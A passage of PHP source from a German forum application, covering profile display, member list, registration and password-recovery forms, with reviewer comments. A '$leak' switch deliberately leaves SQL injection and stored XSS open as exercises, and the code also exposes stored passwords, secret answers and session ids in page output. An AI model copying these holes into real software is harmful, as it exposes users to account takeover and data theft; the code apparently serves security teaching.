."</fieldset></form><script type='text/javascript'><!--
document.forms[0].".(($val) ? "message" : "title").".focus();//--></script>";
}
# Show a user profile (requests Profil and Bearbeiten): optional data sheet for the owner or an
# admin, then the public profile box. Falls back to the member list when nothing can be shown.
if(preg_match('/(Profil|Bearbeiten)/',$request)) {
// Target user id: $mid, else $id, else the current user. All three are set outside this view.
$var = ($mid) ? $mid : (($id) ? $id : $uid);
if((!$lone or $user or $uid) and $var) {
// One row: column 0 is a comma-joined list of per-user counters, followed by every column of [user] (`*`),
// which includes the password, passhelp and session values read further down.
// NOTE(review): $var is interpolated into the sub-selects as it is; confirm it is numeric where it is set.
// WHERE id: with $leak on, $_GET['id'] is concatenated unfiltered (the forum's deliberate SQL-injection
// exercise per the $leak switch); with $leak off it is reduced to digits first.
// Without the admin bit ($status/2%2) only users with a non-null status are returned.
if($usr = $sql['aq']($conn,"
select (select count(*)
from [forum]
where userid = $var and mailid is null and status".(($status%4 == 0) ? "%2 = 0" : " is not null").")
||','|| (select count(*)
from [forum]
where userid = $var and mailid is not null and status is not null)
||','|| (select count(*)
from [forum]
where userid = $var and mailid is not null and status is not null and status/2%2 = 0)
||','|| (select count(*)
from [forum]
where mailid = $var and userid != $var and status is not null)
||','|| (select count(*)
from [forum]
where mailid = $var and userid != $var and status is not null and status/2%2 = 0)
||','|| (select count(*)
from [forum]
where mailid = userid and userid = $var and status".(($status%4 == 0) ? "%2 = 0" : " is not null").")
||','|| (select count(*)
from [file]
where user=$var and status ".(($status%4 == 0) ? '' : '<')."= 1)
||','|| (select sum(abs(size))
from [file]
where user=$var and status is not null) as count,
*
from [user] as u
where ".(($status/2%2) ? "" : "status is not null and ")."id=".((isset($_GET['id']) and $_GET['id']) ? (($leak) ? $_GET['id'] : preg_replace('/\D/','',$_GET['id'])) : (($var) ? $var: $uid)))) {
$usr = reset($usr);
// '@' hides notices for columns missing from the row.
if(isset($usr['id']))
@$creolevar = array_merge($creolevar,array('type' => 'profil', 'id' => $usr['id'], 'name' => $usr['username'], 'from' => $usr['username'], 'title' => $usr['tagline'], 'create' => strtotime($usr['create']), 'change' => strtotime($usr['change']), 'right' => ((is_null($usr['status'])) ? -1 : ($usr['status']/2%2))));
// Cell openers: $v is a plain top-aligned cell, $k the same with nowrap.
$v = "<td valign='top'>";
$k = substr($v,0,-1)." nowrap>";
// passhelp is stored as "<n>-[<question>:]<answer>"; split it into array(question, answer),
// taking the question text from $pass[<n>] when none is stored.
if(isset($usr['passhelp']) and preg_match('/^(\d+)-(?:(.+):)?(.+)$/',$usr['passhelp'],$val) and isset($pass[$val[1]]))
$usr['passhelp'] = array((($val[2] != '') ? $val[2] : $pass[$val[1]]),$val[3]);
// Pad the counter list so the indexes used below exist.
if(substr_count($usr[0],",") < 6)
$usr[0] .= ",0,0,0,0,0,0,0";
$val = explode(',',$usr[0]); // count,mailout,newout,mailin,newin,blog,upload,bytes
// Owner or admin only: navigation links and, with ?id present, the stored-data sheet.
if(($uid == $var or $status/2%2) and isset($usr['id']) and $usr['id']) {
$out .= "<div align='right'>".@preg_replace(array_keys($creole),array_values($creole),"--"
.preg_replace(array('/^.*\[ |~/s','/ \].*$/s'),array('',' | '),$info[4])."[[^"
.((isset($_GET['id'])) ? "Daten".(($status/2%2 and $uid != $usr['id']) ? "?id=$var" : '')."|Daten bearbeiten" : "Profil?id=$var|Meine Daten anzeigen")
."]] | [[^Bearbeiten".(($status/2%2 and $uid != $usr['id']) ? "?id=$var" : '').((count($_POST) == 0)? "#edit" : "")."|Profil bearbeiten]]--")."</div>";
if(isset($_GET['id'])) {
if($status/2%2 and $uid != $var) {
// Admin viewing another user: the Atom link carries a token computed by $hash[0] over that user's
// "username:password" value. The token sits in a URL, so it can surface in history, logs and Referer.
$head['atom'] = "<link rel='alternate' title='Atomfeed von $usr[username]' type='application/atom+xml' href='$self/Atom?id=$var.".$hash[0]($sql['sq']($conn,"select username||':'||password from [user] where id=$var"))."' />";
$uedit = "Daten?id=$var";
}
else
$uedit = "Daten";
// Data sheet. The stored password value and the secret answer are hex-encoded into inline script
// and shown via alert(); the password link reads "Verschlüsselt!" only when the value matches
// salt:...-hash:..., so other stored forms are revealed as they are. Either way the value is in the page source.
// The session id, IP address and user agent of the account are printed as well.
// NOTE(review): username, forename, lastname, mail, page, town, ip, session and useragent are written
// into the markup without an escaping step here; whether they are filtered when stored is outside this view.
$out .= "<fieldset><legend><b>".(($uid == $var) ? "Ihre gespeicherten Daten" : "Die gespeicherten Daten von <b>$usr[username]</b>")."</b></legend><table>
<tr>$k<b>Benutzer-ID:</b></td>$k".number_format($usr['id'],0,'','.')."</td>
$k<b>Benutzername:</b></td>$v$usr[username]</td></tr>
<tr>$k<b>Logins:</b></td>$k".number_format($usr['logins'],0,'','.')."</td>
$k<b>Kennwort:</b></td>$v".(($usr['password'] == '') ? "<em>Nicht angegeben!</em>" : "<script type='text/javascript' language='javascript'>document.write(\"<a href='#' onClick='alert(unescape(\\\"".implode('',preg_replace('/(\w\w)/','%$0',unpack('H*',$usr['password'])))."\\\"))'>".((preg_match('/^salt:\w+-hash:\w+$/',$usr['password'])) ? "Verschlüsselt!" : "Anzeigen")."<\/a>\");</script><noscript><font size='1'><em>Bitte JavaScript aktivieren!</em></font></noscript>")."</td></tr>
<tr>$k<b>Zugriffe:</b></td>$k".number_format($usr['requests'],0,'','.')."</td>
$k<b>Vorname:</b></td>$v$usr[forename]</td></tr>
<tr>$k<b>Änderungen:</b></td>$k".number_format($usr['changes'],0,'','.')."</td>
$k<b>Nachname:</b></td>$v$usr[lastname]</td></tr>
<tr>$k<b>Forumbeiträge:</b></td>$k".number_format(intval($val[0]),0,'','.')."</td>
$k<b>eMail:</b></td>$v<a href='mailto:$usr[mail]'>$usr[mail]</a></td></tr>
<tr>$k<b>Blog:</b></td>$k".number_format($val[5],0,'','.')."</td>
$k<b>Homepage:</b></td>$v".(($usr['page'] == '') ? "<em>Nicht angegeben!</em>" : "<a href='".preg_replace('/^(?!https?:\/\/)/','http://',$usr['page'])."'$tgb>$usr[page]</a>")."</td></tr>
<tr>$k<b>Mailverkehr:</b></td>$k".(($val[4]) ? "<span title='Eingang (Neu)'>".number_format($val[4],0,'','.')."</span> / " : "")."<span title='Eingang (Alle)'>".number_format($val[3],0,'','.')."</span> | ".(($val[2]) ? "<span title='Ausgang (Neu)'>".number_format($val[2],0,'','.')."</span> / " : "")."<span title='Ausgang (Alle)'>".number_format($val[1],0,'','.')."</span></td>
$k<b>Wohnort:</b></td>$v".(($usr['town'] == '') ? "<em>Nicht angegeben!</em>" : $usr['town'])."</td></tr>
<tr>$k<b>Chat-Texte:</b></td>$k".$sql['sq']($conn,"select count(*) from [chat] where id = $var")."</td>
$k<b>Chat-Status:</b></td>$v".(($usr['chat'] and substr($usr['chat'],0,1) != '-') ? "Im Chat mit: ".((is_array($wrt = $sql['sq']($conn,"
select ifnull(username,'Unbekannt')
from [user]
where id != $uid and id != chat and chat = ".strval($usr['chat'])."
order by username"))) ? implode(', ',$wrt) : $wrt) : (($status/4%2) ? "Frei" : "Aus")).(($status/8%2) ? " <span title='Verschlüsselt'>$lock</span>" : '')."</td></tr>
<tr>$k<b>Dateien:</b></td>$k$val[6]</td>
$k<b>Sicherheitsfrage:</b></td>$v".((is_array($usr['passhelp'])) ? $usr['passhelp'][0] : "<em>Nicht angegeben!</em>")."</td></tr>
<tr>$k<b>Datei-Freiraum:</b></td>$k".number_format($maxfile-$val[7],0,'','.')." Bytes</td>
$k<b>Geheim-Antwort:</b></td>$v".((is_array($usr['passhelp'])) ? "<script type='text/javascript'>document.write(\"<a href='#' onClick='alert(unescape(\\\"".implode('',preg_replace('/(\w\w)/','%$0',unpack('H*',$usr['passhelp'][1])))."\\\"))'>Anzeigen<\/a>\");</script><noscript><font size='1'><em>Bitte JavaScript aktivieren!</em></font></noscript>" : "<em>Nicht angegeben!</em>")."</td></tr>
<tr>$k<b>Status:</b></td>{$v}Log ".(($usr['status']%2) ? 'in' : 'off')."</td>
$k<b>Geburtstag:</b></td>$v".(($usr['born']) ? date('d.m.Y',strtotime($usr['born']))." (".floor((time()-strtotime($usr['born']))/365.2425/24/60/60).")" : "<em>Nicht angegeben!</em>")."</td></tr>
<tr>$k<b>Rechte:</b></td>$k".(($usr['status']/2%2) ? 'Admin' : ((is_null($usr['status'])) ? 'Keine' : 'Benutzer'))."</td>
$k<b>Bildschirm:</b></td>$v".(($usr['info'] == '') ? "<em>Nicht angegeben!</em>" : preg_replace('/(\d+),(\d+),(\d+)/','$1 * $2 / $3',$usr['info']))."</td></tr>
<tr>$k<b>Erstanmeldung:</b></td>$k".date('d.m.Y H:i:s',strtotime($usr['create']))."</td>
$k<b>IP-Adresse:</b></td>$v$usr[ip]</td></tr>
<tr>$k<b>Letzter Besuch:</b></td>$k".((isset($_SESSION['lua']) and $uid == $usr['id']) ? date('d.m.Y H:i:s',strtotime($_SESSION['lua'])) : "<em>Unbekannt</em>")."</td>
$k<b>SessionID:</b></td>$v$usr[session]</td></tr>
<tr>$k<b>Letzte Aktion:</b></td>$k".date('d.m.Y H:i:s',strtotime($usr['change']))."</td>
$k<b>Browser:</b></td>$v$usr[useragent]</td></tr>
</table></fieldset>";
}
}
// Contact line for the public box; $v is reused as the list of entries.
// The homepage value gets an http:// prefix unless it already starts with http:// or https://
// and is then written into a single-quoted href as stored.
if(isset($usr['id']) and $usr['id']) {
$v = array("Erstanmeldung: ".date('d.m.Y',strtotime($usr['create'])));
if($val[0])
$v[] = "<a href='$self?id=$usr[id]'>Beiträge: ".number_format($val[0],0,'','.')."</a>";
if(isset($val[5]) and $val[5])
$v[] = "<a href='$self/Blog/$usr[username]'>Blogs: ".number_format($val[5],0,'','.')."</a>";
if(isset($val[6]) and $val[6])
$v[] = "<a href='$self?s=d&id=$usr[id]'>Uploads: ".number_format($val[6],0,'','.')."</a>";
if($uid or $gast)
$v[] = "<a href='$self/Beitrag?mail=$usr[id]'>Mail an $usr[username]</a>";
if($usr['page'])
$v[] = "Homepage: <a href='".preg_replace('/^(?!https?:\/\/)/','http://',$usr['page'])."'$tgb>".preg_replace('!^https?://!','',$usr['page'])."</a>";
if(!$uedit and ($uid == $usr['id'] or $status%2))
$uedit = "Bearbeiten".(($uid != $usr['id']) ? "?id=$usr[id]" : "")."#edit";
}
// Public profile box.
// Tagline: passed through the full $html map when $leak is off or ?source is given; raw under $leak.
// Marker icon: under $leak, for an admin or with the debug cookie, a profile containing a <script> element
// gets a link to its ?source view.
// Body: with ?source under $leak the profile is shown as literal text. Otherwise it is rendered by the
// Creole rules; under $leak the strtr() map is empty, so stored markup reaches the page unchanged (the
// author's trailing "XSS" marker). With $leak off, $html minus its first entry is applied first.
// A posted `profil` together with `test` is previewed through the same path.
$out .= "<fieldset class='cr'><legend>Profil von <b>".(($uid and isset($usr['id']) and $usr['id'] and $var != $uid) ? "<a href='$self/Beitrag?mail=$usr[id]' title='Mail an $usr[username]'>$usr[username]</a>"
: $usr['username'])."</b>".((!isset($usr['tagline']) or !$usr['tagline']) ? "" : " (<small id='tl' title='Tagline'>".@preg_replace(array_keys($creole),array_values($creole),
(($leak and isset($_GET['source']) or !$leak) ? strtr($usr['tagline'],$html) : $usr['tagline']))."</small>)").(($request == 'Bearbeiten') ? " <small><a href='#edit'>(edit)</a></small>" : '')
."</legend>"
.(($leak and isset($usr['id']) and $usr['id'] and ($status/2%2 or isset($_COOKIE['debug']) and $_COOKIE['debug']) and preg_match("!<(script)[^>]*>.*</\\1>!i",$usr['profil'])) ? "<a href='$self/Profil/$usr[username]?source'><img align='right' src='$self/img?".(count($img)-2)."' border='0' height='16' style='height:1em' alt='XSS' title='XSS Quelltext' /></a>" : '')
.((count($v) > 1) ? "<div id='kontakt'><small>".implode(' / ',$v)."</small></div><hr />" : "")."<div id='profil'>"
.(($leak and isset($_GET['source'])) ? "<pre style='white-space:pre-wrap'>".strtr($usr['profil'],$html)."</pre>"
: @preg_replace(array_keys($creole),array_values($creole),
strtr(((isset($_POST['profil']) and isset($_POST['test'])) ? $_POST['profil'] : ((is_null($usr['profil'])) ? 'Noch kein Profil hinterlegt!' : $usr['profil'])),(($leak) ? array() : array_slice($html,1)))))."</div></fieldset>"; // XSS
}
else {
// No matching row: report it and continue with the member list.
$out .= "<h3>Benutzer nicht gefunden!</h3>";
$request = 'Mitglieder';
}
}
else
$request = 'Mitglieder';
}
# User profile edit form: one form for the tagline, one for the profile text.
# Shown for request 'Bearbeiten' to a logged-in user when $rw is set. $usr is the row
# loaded by the profile display code above.
// An admin ($status/2%2) editing somebody else's profile gets that user's id added to both forms.
// The tagline goes through the full $html map; the profile text goes through the $phtml
// pattern/replacement pair (presumably escaping for form fields - defined outside this view).
// The "Strip HTML" button is offered to admins or when the debug cookie is set.
// NOTE(review): the tagline form uses method='get', so the new value travels in the URL
// (history, logs, Referer), and neither form contains a per-request token field; whether the
// handlers verify the request origin some other way is outside this view.
if($request == 'Bearbeiten' and $uid and $rw)
$out .= "<br /><a name='edit'></a><form action='$self/$request' method='get'>"
.(($status/2%2 and $uid != $usr['id']) ? "<input type='hidden' name='id' value='$usr[id]'>" : '')
."<fieldset><legend><b>Tagline Bearbeiten</b></legend><table width='100%'><tr><td width='99%'><input type='text' size='80' maxlength='255' style='width:100%' name='tl' value='".strtr($usr['tagline'],$html)."' ondblclick='this.value=\"\"' /></td><td><input type='submit' value='Setzen' /></td></tr></table></fieldset></form>
<form name='profile' action='$self/Bearbeiten".(($status/2%2 and $uid != $usr['id']) ? "?id=$usr[id]" : '')."' method='post'>
<fieldset><legend><b>Profil Bearbeiten</b> <small>(<a href='#edit'>edit</a>)</small></legend><textarea style='width:100%' name='profil' cols='80' rows='15' id='bearbeiten'>".preg_replace($phtml[0],$phtml[1],((isset($_POST['profil'])) ? $_POST['profil'] : $usr['profil']))."</textarea><br />
<input type='hidden' name='uid' value='$usr[id]' /><input type='submit' name='test' value='Vorschau' />
<input type='submit' name='save' value='Speichern' /> <input type='reset' value='Zurücksetzen' />
<input type='submit' name='stop' value='Abbruch' />"
.(($status/2%2 or isset($_COOKIE['debug']) and $_COOKIE['debug']) ? " <input type='button' value='Strip HTML' onClick='document.profile.profil.value=document.profile.profil.value.replace(/(?:^\s+|\s*<(\w+).*?>(.*?<\/\\1>\s*)?|\s+\$)/g,\"\"),document.profile.onsubmit=false' />" : "")
."</fieldset></form>";
# Members list ("Mitglieder"): paged table with one row per account.
# Status bits as the row rendering below shows them for the listed user:
#   status%2   -> "Log in" / "Log off"
#   status/2%2 -> "Admin" (else "Benutzer", or "-" when status is null)
# $status is the viewer's value; presumably it uses the same encoding - confirm.
# NOTE(review): username, chatuser, fore/last name, ip, useragent and page are written into
# the markup exactly as stored; only the tagline used as title attribute passes through
# strtr(...,$html) and the mailto target through rawurlencode(). Escape per output context
# wherever raw output is not the intended demonstration.
if($request == 'Mitglieder' and (!$lone or $user or $uid)) {
// The "status is not null" filter is dropped only when $id is set and the viewer has the admin bit.
$data = (($id and $status/2%2) ? "" : "\n\twhere u.status is not null");
$num = $sql['sq']($conn,"select count(*) from [user] as u$data");
// No page requested: default to page 1.
if($page[0] == '')
$page = array(1,"page=1");
// The return value is discarded. NOTE(review): presumably the $paging[5]/$paging[6] replacement
// (defined elsewhere) sets the paging variables used below ($val, $code) as a side effect - confirm.
// $sort is interpolated into the href as-is; confirm it is validated where it is read.
preg_replace($paging[5],$paging[6],"$num,$max,<a href='$self/Mitglieder?page=#key##max#".(($sort) ? "&sort=$sort" : "")."' title='#var#'>#key#</a>");
// One row per user plus counters from sub-selects: forum posts (f), mail/blog counts (m), files (d),
// new threads (t). p, s and c are joins back onto [user]: p.id is set when a profile exists, s.id when
// that profile matches '%<script%>%</script>%', c is the chat partner.
// The statement is assembled by concatenation: $data, the order clause produced from $sorth[2]/$sorth[3],
// $val and $max are spliced in. NOTE(review): $val and $max are set outside this block - confirm they
// are integers before they reach "limit".
if($rows = $sql['aq']($conn,"
select u.username as username,
u.[create],
u.change,
f.count as count,
m.bcount as blogs,
m.count as mails,
d.count as files,
u.status/4%2||','||ifnull(u.chat,'-'),
u.status/2%2,
u.status%2,
u.page as page,
u.forename as fore,
u.lastname as last,
u.ip as ip,
u.id as id,
u.chat as chat,
u.mail as mail,
u.status as status,
u.useragent as agent,
u.tagline as tagline,
p.id as profil,
s.id as script,
strftime('%d.%m.%Y %H:%M',u.[create]) as angemeldet,
strftime('%d.%m.%Y %H:%M',u.change) as aktion,
f.userid as userid,
m.mid as mailid,
m.rcount as rcount,
d.pcount as pcount,
t.tcount as tcount,
c.username as chatuser
from [user] as u
left join ( select userid,
count(*) as count
from [forum]
where status".(($status%4 == 0) ? "%2 = 0" : " is not null")." and mailid is null
group by userid) as f
on f.userid = u.id
left join ( select u.id as mid,
count(f.id)-count(b.id) as count,
count(b.id) as bcount,
count(m.id)-count(r.id) as rcount
from [user] as u
left join [forum] as f on f.userid = u.id or f.mailid = u.id
left join [forum] as r on r.id = f.id and r.mailid = u.id and r.status/2%2 = 1
left join [forum] as m on m.id = f.id and m.mailid = u.id
left join [forum] as b on b.id = f.id and b.mailid = u.id and b.mailid = b.userid and b.status".(($status%4 == 0) ? "%2 = 0" : " is not null")."
where f.status is not null and f.mailid is not null
group by u.id) as m
on m.mid = u.id
left join ( select a.user,
count(*) as count,
count(p.id) as pcount
from [file] as a
left join [file] as p on p.id = a.id and p.status/2%2 = 0
where a.status is not null
group by a.user) as d
on d.user = u.id
left join ( select userid,
count(*) as tcount
from [forum] as t
where path is null and mailid is null and t.status is not null
group by userid) as t
on t.userid = u.id
left join [user] as p on p.id = u.id and p.profil is not null
left join [user] as s on s.id = p.id and s.profil like '%<script%>%</script>%'
left join [user] as c on c.id = u.chat"
.$data.preg_replace($sorth[2],$sorth[3],"u.username;13;u.username")."
limit $val,$max")) {
$row = array();
// Build one <tr> per user. With $leak set, an admin viewer gets a '#ffe0e0' cell background when the
// profile contains a <script> element (s.id) or the tagline contains a paired HTML tag.
// The mail, file, chat and name/IP columns are only emitted for viewers with the matching status bit.
// NOTE(review): "!$status/2%2" parses as ((!$status)/2)%2 because ! binds tighter than / and %, and
// that is always 0; the "Kein Profil hinterlegt" branch therefore never runs. "!($status/2%2)" was
// probably meant - confirm.
foreach($rows as $var)
$row[] = "<tr><td".(($leak and $status/2%2 and $var['script']) ? " bgcolor='#ffe0e0'" : "").">"
.(((is_null($var['profil']) or $var['profil'] == '') and !$status/2%2) ? "<span title='Kein Profil hinterlegt'>$var[username]</span>"
: "<a href='$self/Profil/$var[username]' title='Profil anzeigen'>".((is_null($var['profil']) or $var['profil'] == '' or !$status/2%2)
? $var['username'] : "<b>$var[username]</b>")."</a>")."</td><td nowrap>$var[angemeldet]</td><td nowrap>$var[aktion]</td><td align='center'>"
.((intval($var['count'])) ? (($var['tcount']) ? "<span title='Neue Threads'>$var[tcount]</span>/" : "")."<a href='$self?id=$var[id]' title='Gesamtbeiträge'>$var[count]</a>" : "-")."</td><td align='center'>".(($var['blogs']) ? "<a href='$self/Blog/$var[username]'>$var[blogs]</a>" : '-')."</td><td align='center'>"
.(($status/2%2) ? ((intval($var['mails'])) ? "<a href='$self/Mail?id=$var[id]'>"
.(($var['rcount'] > 0) ? "<span title='Ungelesen'>$var[rcount]</span>/" : "")."<span title='Im Postfach'>$var[mails]</span></a>" : "-")."</td><td align='center'>"
.((intval($var['files'])) ? ((intval($var['pcount'])) ? "<a href='$self?s=d&id=$var[id]' title='Nur Öffendliche Dateien'>$var[pcount]</a>/" : '')."<a href='$self/Datei/$var[username]' title='Alle Dateien'>$var[files]</a>" : "-")."</td><td align='center'>" : '').(($status%2) ? (($var['status']/4%2 and is_null($var['chat']))
? "Frei" : (($var['chat']) ? (($status/2%2) ? "<a href='$self/Profil/$var[chatuser]' title='Im Chat mit $var[chatuser]'>Chat</a>" : "Chat") : "-"))
.(($var['status']/8%2 and ($var['chat'] or $var['status']/4%2)) ? " <span title='Verschlüsselt'>$lock</span>" : '')."</td><td align='center'>" : "")
.(($var['status']/2%2) ? 'Admin' : ((is_null($var['status'])) ? '-' : 'Benutzer'))
."</td><td align='center' nowrap>".(($var['status']%2) ? (($status/2%2) ? "<a href='$self/Abmelden?id=$var[id]' title='Abmelden'>Log in</a>" : "Log in") : "Log off")
."</td><td align='center'".(($leak and $status/2%2 and preg_match("!<(\w+)[^>]*>.*</\\1>!i",$var['tagline'])) ? " bgcolor='#ffe0e0'" : "").">".(($uid or $gast) ? "<a href='$self/Beitrag?mail=$var[id]' title='".strtr(preg_replace('/\t+.*$/','',$var['tagline']),$html)."'>Mail</a> " : (($var['page']) ? "" : "-")).(($var['page'] == '') ? "" : "<a href='".preg_replace('/^(?!https?:\/\/)/','http://',$var['page'])."'$tgb>www</a> ")
.(($status/2%2) ? "</td><td><a href='mailto:".rawurlencode("$var[fore] $var[last] <$var[mail]>")."' title='eMail'>$var[fore] $var[last]</a></td><td title='$var[agent]'>$var[ip]" : '')
."</td></tr>";
// Wrap the rows in the table; the header cells are produced by the $sorth[0]/$sorth[1] replacement
// from the tab-separated "label=column" list, and $code is printed below the table.
$out .= "<fieldset><legend><b>Mitglieder</b></legend><table border='1'><tr>".preg_replace($sorth[0],$sorth[1],"Benutzername=1\tErstanmeldung=2\tLetzte Aktion=3\tBeiträge=4\tBlogs=5\t(Mails=6)\t(Dateien=7)\t{Chat=8}\tRechte=9\tStatus=10\tKontakt=11\t(Vor-=12 / Nachname=13\tIP-Adresse=14)")."</tr>".implode("",$row)."</table><h4 align='center'>$code</h4></fieldset>";
}
}
# Registration / personal data form: rendered when $request is 'Anmelden' or 'Daten',
# ($uid or $user) holds and $rw is set.
if(preg_match('/^(Dat|Anmeld)en$/',$request) and ($uid or $user) and $rw) {
if($uid) {
// Logged in: preload the form from the stored row. A viewer with the admin bit may select another
// account through $_REQUEST['id']; only the first run of digits matched by /\d+/ reaches the query,
// otherwise $uid is used.
$array = reset(($sql['aq']($conn,"select * from [user] where id=".(($status/2%2 and isset($_REQUEST['id']) and preg_match('/\d+/',$_REQUEST['id'],$var)) ? $var[0] : $uid),SQLITE_ASSOC)));
// NOTE(review): for admin viewers the stored password column is copied to 'userpass'; the merge loop
// below moves it into $post and the form then writes $post['userpass'] into a hidden field, so
// whatever the column holds ends up in the page source.
if($status/2%2)
$array['userpass'] = $array['password'];
elseif($array['password'] == '')
$post['userpass'] = '';
unset($array['password']);
// passhelp has the form "<question number>-[<own question>:]<answer>"; question number 0 selects
// the user's own question text.
if(preg_match('/^(\d+)-(?:(.+):)?(.+)$/',$array['passhelp'],$var)) {
if(!$post['question'] = $var[1])
$post['myquestion'] = $var[2];
$post['answer'] = $var[3];
}
// Stored values fill every $post key that is missing or equals the stored value case-insensitively.
foreach($array as $key => $var)
if(!isset($post[$key]) or strtolower($post[$key]) == strtolower($var))
$post[$key] = $var;
}
// Form markup. The {name|label|size|maxlength} placeholders are expanded by the $formcheck[0]/
// $formcheck[1] replacement, which is defined elsewhere.
// With $leak set, the question <select> has no onchange handler and the own question travels in a
// hidden field instead of a text input.
// NOTE(review): $post values (id, username, userpass, born, myquestion) are concatenated into attribute
// values and option text without HTML escaping.
// NOTE(review): preg_replace() with the /e modifier evaluates the replacement as PHP code for every
// entry of $pass. The modifier was deprecated in PHP 5.5 and removed in PHP 7.0;
// preg_replace_callback() is the supported replacement.
$out .= '<table align="'.((!$uid and $register) ? "right" : "center").'"><tr><td><form name="register" action="'.$self.'/'.$request.'" method="post"><fieldset><legend><b>Persönliche Daten</b></legend>
<small>Bitte geben Sie Ihre Daten ein'.((!$uid) ? ', um einen Benutzeraccount zu erstellen' : '').':<br />(Alle Felder mit einen * sind Pflichfelder!)</small>
<table><tr><td valign="top">'.(($status/2%2) ? '<input type="hidden" name="id" value="'.$post['id'].'" />' : '').'
'.preg_replace($formcheck[0],$formcheck[1],(($uid and $status/2%2 == 0) ? '<input type="hidden" name="username" value="'.$post['username'].'" />' : '{username|*Benutzername:|20|64}<br />')
.(($uid and $status/2%2 == 0) ? '{userpass|*Altes Kennwort:|*20|64}<br />' : '<input type="hidden" name="userpass" value="'.((isset($post['userpass'])) ? $post['userpass'] : '').'" />').'{password,probate|*Kennwort:|*20|64}<br />{probate,password|*Kennwort wiederholen:|*20|64}</td>
<td valign="top">{forename|*Vorname:|20|64}<br />{lastname|*Nachname:|20|64}<br />{mail|*eMail:|20|255}<br /></td>
<td valign="top"><small>Geburtstag: <font size="1">(TT.MM.JJJJ)</font></small><br /><input type="text" size="20" maxlength="10" name="born" value="'.((isset($post['born'])) ? preg_replace('/(\d{4})-(\d{2})-(\d{2})/','$3.$2.$1',$post['born']) : '').'" /><br />{town|Wohnort:|20|64}<br />{page|Homepage:|20|255}<br /></td></tr>
<tr><td colspan="2"><small>Persönliche Frage: (Benötigt für Kennwort Vergessen)</small><br />
<select size="1" name="question" style="width:100%'.(($leak) ? '"' : ((isset($post['myquestion']) and $post['myquestion'] != '') ? ";display:none" : "").'" onchange="'.preg_replace($js,'',"
if(this.value == '-') {
this.style.display = 'none';
this.selectedIndex = '0';
var x = document.getElementsByName('myquestion')[0];
x.style.display = 'block';
x.focus();
}").'"').'>'.implode("\n",preg_replace('/.+/e','"<option value=\'".((isset($x)) ? ($x++)+1 : $x=0)."\'".((isset($post[\'question\']) and $post[\'question\'] == $x) ? " selected" : "").">$0</option>"',$pass))
.(($leak) ? ((isset($post['myquestion']) and $post['myquestion'] != '') ? "<option value='0' selected>$post[myquestion]</option>" : "")."</select><input type='hidden' name='myquestion' value='".((isset($post['myquestion'])) ? $post['myquestion'] : '')."' />" : "<option value='-'>Eigene Frage stellen...</option></select>")
.(($leak) ? "" : "<input type='text' style='width:100%".((isset($post['myquestion']) and $post['myquestion'] != '') ? "" : ";display:none")."' name='myquestion' size='40' maxlength='96' value='".((isset($post['myquestion']) and $post['myquestion'] != '') ? $post['myquestion'] : "")."' onblur='".preg_replace($js,'','
if(this.value == "") {
this.style.display = "none";
var x = document.getElementsByName("question")[0];
x.style.display = "block";
x.focus();
}')."'>").'</td><td>{answer|Persönliche Antwort:|20|96}</td></tr>
<tr><td colspan="3" align="center"><input type="hidden" name="info" value="" /><input type="submit" name="'.(($uid) ? 'change" value="Ändern' : 'register" value="Anmelden').'" /> <input type="submit" name="stop" value="Abbrechen" />
'.(($uid or $status/2%2) ? '<input type="submit" name="kill" value="Mitgliedschaft beenden" onclick="return confirm(\'Wirklich Löschen?\')" />' : "")).'
</td></tr></table></fieldset></form></td></tr></table><script type="text/javascript">'."<!--\n".preg_replace($js,'','
x = document.register,
x.info.value = screen.width + "," + screen.height + "," + screen.colorDepth;
((x.username.type == "text") ? x.username : (x.userpass.value == "") ? x.userpass : x.password).focus();').'//--></script>';
// Optional CMS text shown with the registration form; its content is passed through
// strtr(...,array_slice($html,1)) and the $creole replacements before output.
// NOTE(review): $register sits inside the quoted LIKE pattern without an escaping helper; it is set
// outside this block - confirm it cannot carry a quote. The leading @ hides preg_replace() warnings.
if($request == "Anmelden" and $register)
$out .= "<div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),strtr($sql['sq']($conn,"
select content
from cms
where name like '$register'
limit 1"),array_slice($html,1)))."</div>";
}
# Forgotten-password form: rendered when $request is 'Kennwort', nobody is logged in and $rw is set.
// The statement appends the form and a script. getask() runs when the username field (and, without
// $leak, the mail field) loses focus: it sends a synchronous GET to "$self?ask=..." and, when the reply
// matches /^(\d+)-(.*)$/, either selects that question number or replaces the first option's text with
// the returned question.
// With $leak set, only the username is requested; the mail, forename and lastname fields are omitted
// and the ask request carries the username alone.
// NOTE(review): the handler for "?ask=" is outside this block. As called here it appears to hand the
// recovery question to a visitor who is not logged in, and the field values are appended to the URL
// without encodeURIComponent().
// NOTE(review): preg_replace() with the /e modifier evaluates the replacement as PHP code for every
// entry of $pass; $post['myquestion'] is written into the first option without HTML escaping. The
// modifier was deprecated in PHP 5.5 and removed in PHP 7.0; preg_replace_callback() replaces it.
if($request == 'Kennwort' and !$uid and $rw)
$out .= '<table align="center"><tr><td><form name="password" action="'.$self.'/'.$request.'" method="post"><fieldset><legend><b>Kennwort Vergessen</b></legend>
<small>Bitte geben Sie Ihre Daten ein, um ihr Kennwort zu löschen!<br />(Alle Felder mit einen * sind Pflichfelder!)</small>
<table><tr><td'.preg_replace($formcheck[0],$formcheck[1],(($leak) ? ' colspan="2"' : '').'>{username|*Benutzername:|20|64|onblur=getask()'.(($leak) ? '|style=width:100%}</td></tr>' : '}<br />{mail|*eMail:|20|64|onblur=getask()}</td><td>{forename|*Vorname:|20|64}<br />{lastname|*Nachname:|20|64}</td></tr>')
.'<tr><td colspan="2"><small>'.((isset($post) and (!isset($post['question']) or !$post['question'] and !isset($post['myquestion']))) ? '<font color="#ff0000">*Persönliche Frage:</font>' : '*Persönliche Frage:').'</small><br />
<select size="1" name="question" style="width:100%">'.implode("\n",preg_replace('/.+/e','"<option value=\'".((isset($x)) ? ($x++)+1 : $x=0)."\'".((isset($post[\'question\']) and $post[\'question\'] == $x) ? " selected" : "").">".(($x == 0 and isset($post["myquestion"]) and $post["myquestion"]) ? "$post[myquestion]" : "$0")."</option>"',$pass)).'</select><br />
{answer|*Persönliche Antwort:|20|255|style=width:100%}<br /></td></tr>
<tr><td>{password,probate|*Neues Kennwort:|*20|64}</td><td>{probate,password|*Kennwort wiederholen:|*20|64}</td></tr>
<tr><td colspan="2"><center><input type="submit" name="restore" value="Kennwort zurücksetzen" /> <input type="submit" name="stop" value="Abbrechen" /></center></td></tr>
</table></fieldset></form></td></tr></table><script type="text/javascript">')."<!--\n".preg_replace($js,'',"
document.password.username.focus();
try { // Request vorbereiten
var a = new XMLHttpRequest();
}
catch(e) {
